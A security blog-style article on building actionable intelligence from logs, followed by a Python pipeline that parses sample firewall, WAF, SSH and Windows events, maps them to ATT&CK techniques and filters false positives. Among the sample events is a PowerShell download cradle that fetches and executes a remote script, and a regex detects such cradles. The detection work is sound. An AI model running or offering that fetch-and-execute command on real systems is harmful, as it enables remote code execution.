Actionable Intelligence Cyber Security
In cyber security you get intelligence from several sources: logs, alerts generated by the appliances in the network, external threat intelligence providers, and so on.
At the end of the day, you need actionable intelligence, for example "File abc.exe on system XYZ is malicious; the recommended action is to remove the file", or "The recommended action is to block, on your firewall, the specific IP addresses that are sending malicious requests to your web server".
The security team needs intelligence in that form. Creating a set of actionable intelligence feeds, however, is time-consuming and requires a security analyst's expertise, and you need absolute clarity about which detections are true positives and which are false positives.
What is the simple process to follow?
- Have clarity on what alerts and detections you are planning to work with.
- Identify the network-level log sources such as the firewall, IDS, IPS and WAF, and collect the required logs from them.
- Identify and collect the endpoint logs, such as Windows event logs, Linux syslog, Windows Defender logs and antivirus logs.
- Parse the collected data into various buckets and categories.
- Map the parsed data to MITRE ATT&CK techniques. This takes time, but you have to start somewhere and keep working on it continuously.
- Make sure your analysts treat the ATT&CK-mapped output as actionable intelligence only after the false positives have been removed.
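The steps above, end to end, as an added example (not code from the original article): constructed firewall, WAF, Linux auth and Windows event lines are parsed into network and endpoint buckets, correlated, mapped to ATT&CK technique IDs, filtered against an analyst-maintained allowlist of known-benign sources, and turned into recommendations of the "block this IP on the firewall" kind. The log formats are simplified and made up for the example; the thresholds, the allowlist, and the action texts are assumptions. Windows event IDs 4625 (failed logon) and 4104 (PowerShell script block logging) and the ATT&CK IDs are real, but the mapping rules are deliberately crude.

```python
"""Toy pipeline: raw logs -> parsed buckets -> ATT&CK mapping -> false-positive filter -> actions."""
import re
from collections import defaultdict

# Constructed sample events for this example (simplified formats, not real logs).
SAMPLE_LOGS = [
    "fw01 DENY src=203.0.113.7 dst=198.51.100.10 dport=21 proto=TCP",
    "fw01 DENY src=203.0.113.7 dst=198.51.100.10 dport=22 proto=TCP",
    "fw01 DENY src=203.0.113.7 dst=198.51.100.10 dport=23 proto=TCP",
    "fw01 DENY src=203.0.113.7 dst=198.51.100.10 dport=445 proto=TCP",
    "fw01 DENY src=203.0.113.7 dst=198.51.100.10 dport=3389 proto=TCP",
    # The internal vulnerability scanner does the same thing: expected, so a false positive.
    "fw01 DENY src=10.0.0.50 dst=198.51.100.10 dport=21 proto=TCP",
    "fw01 DENY src=10.0.0.50 dst=198.51.100.10 dport=22 proto=TCP",
    "fw01 DENY src=10.0.0.50 dst=198.51.100.10 dport=23 proto=TCP",
    "fw01 DENY src=10.0.0.50 dst=198.51.100.10 dport=445 proto=TCP",
    "fw01 DENY src=10.0.0.50 dst=198.51.100.10 dport=3389 proto=TCP",
    "waf01 BLOCK src=203.0.113.9 uri=/login.php rule=sqli",
    "sshd[1201]: Failed password for root from 203.0.113.5 port 40001 ssh2",
    "sshd[1202]: Failed password for root from 203.0.113.5 port 40002 ssh2",
    "sshd[1203]: Failed password for admin from 203.0.113.5 port 40003 ssh2",
    "host=WS01 EventID=4625 TargetUserName=jdoe IpAddress=203.0.113.5",
    "host=WS01 EventID=4625 TargetUserName=jdoe IpAddress=203.0.113.5",
    "host=WS01 EventID=4104 ScriptBlockText=IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.8/a.ps1')",
    "host=WS02 EventID=4104 ScriptBlockText=Get-ChildItem C:\\Users",
]

# Steps 2-3 (collect) and 4 (parse into buckets): one regex per log source, tagged with its bucket.
PARSERS = [
    ("network/firewall", re.compile(r"^fw\d+ DENY src=(?P<src>\S+) dst=\S+ dport=(?P<dport>\d+)")),
    ("network/waf", re.compile(r"^waf\d+ BLOCK src=(?P<src>\S+) uri=\S+ rule=(?P<rule>\S+)")),
    ("endpoint/linux-auth", re.compile(r"Failed password for (?P<user>\S+) from (?P<src>\S+)")),
    ("endpoint/windows", re.compile(
        r"^host=(?P<host>\S+) EventID=(?P<event_id>\d+)"
        r"(?: TargetUserName=(?P<user>\S+) IpAddress=(?P<src>\S+))?"
        r"(?: ScriptBlockText=(?P<script>.*))?$")),
]

def parse(lines):
    """Return one dict per recognised line; unmatched groups come back as None."""
    events = []
    for line in lines:
        for bucket, rx in PARSERS:
            m = rx.search(line)
            if m:
                events.append({"bucket": bucket, "raw": line, **m.groupdict()})
                break
    return events

# Step 5: map parsed events to ATT&CK techniques. Thresholds are assumptions for the example.
PORT_SCAN_THRESHOLD = 4      # distinct denied ports from one source
BRUTE_FORCE_THRESHOLD = 3    # failed logons from one source, across Linux and Windows
DOWNLOAD_CRADLE = re.compile(r"DownloadString|DownloadFile|IEX|Invoke-Expression", re.I)

def map_to_attack(events):
    """Turn parsed events into (technique, subject, evidence) findings."""
    findings = []
    ports_by_src = defaultdict(set)
    fails_by_src = defaultdict(int)
    for e in events:
        b = e["bucket"]
        if b == "network/firewall":
            ports_by_src[e["src"]].add(e["dport"])
        elif b == "network/waf" and e["rule"] == "sqli":
            findings.append(("T1190 Exploit Public-Facing Application", e["src"], e["raw"]))
        elif b == "endpoint/linux-auth" or (b == "endpoint/windows" and e["event_id"] == "4625"):
            fails_by_src[e["src"]] += 1   # correlate Linux and Windows failures per source
        elif b == "endpoint/windows" and e["event_id"] == "4104" and DOWNLOAD_CRADLE.search(e["script"] or ""):
            findings.append(("T1059.001 Command and Scripting Interpreter: PowerShell", e["host"], e["raw"]))
    for src, ports in ports_by_src.items():
        if len(ports) >= PORT_SCAN_THRESHOLD:
            findings.append(("T1046 Network Service Discovery", src, f"{len(ports)} distinct ports probed"))
    for src, n in fails_by_src.items():
        if n >= BRUTE_FORCE_THRESHOLD:
            findings.append(("T1110 Brute Force", src, f"{n} failed logons across Linux and Windows"))
    return findings

# Step 6: what the analyst knows that the raw feed does not. Constructed allowlist.
KNOWN_BENIGN_SOURCES = {"10.0.0.50"}   # internal vulnerability scanner

ACTIONS = {   # recommended action per technique ID; wording is an assumption
    "T1046": "Block {subject} on the perimeter firewall and check whether any probed port answered.",
    "T1190": "Block {subject} on the WAF/firewall and review web server logs for the same source.",
    "T1110": "Block {subject} on the firewall; reset passwords and enforce MFA for the targeted accounts.",
    "T1059.001": "Isolate {subject}, retrieve the downloaded script, and hunt for the same URL on other hosts.",
}

def build_actionable_intel(lines, known_benign=KNOWN_BENIGN_SOURCES):
    """Full pipeline: parse, map, drop known false positives, attach a recommended action."""
    intel = []
    for technique, subject, evidence in map_to_attack(parse(lines)):
        if subject in known_benign:
            continue   # expected behaviour from an allowlisted source: not actionable
        tid = technique.split()[0]
        intel.append({"technique": technique, "subject": subject, "evidence": evidence,
                      "action": ACTIONS[tid].format(subject=subject)})
    return intel

if __name__ == "__main__":
    for item in build_actionable_intel(SAMPLE_LOGS):
        print(f"[{item['technique']}] {item['subject']}: {item['evidence']}\n  -> {item['action']}")
```

Two points the list alone does not show: the brute-force finding only crosses the threshold because Linux auth failures and Windows 4625 events are counted together per source, which is why the parsed data has to land in a common structure before mapping; and the scanner at 10.0.0.50 triggers exactly the same T1046 logic as the attacker, so without the analyst-maintained allowlist the "actionable" output would tell you to block your own scanner.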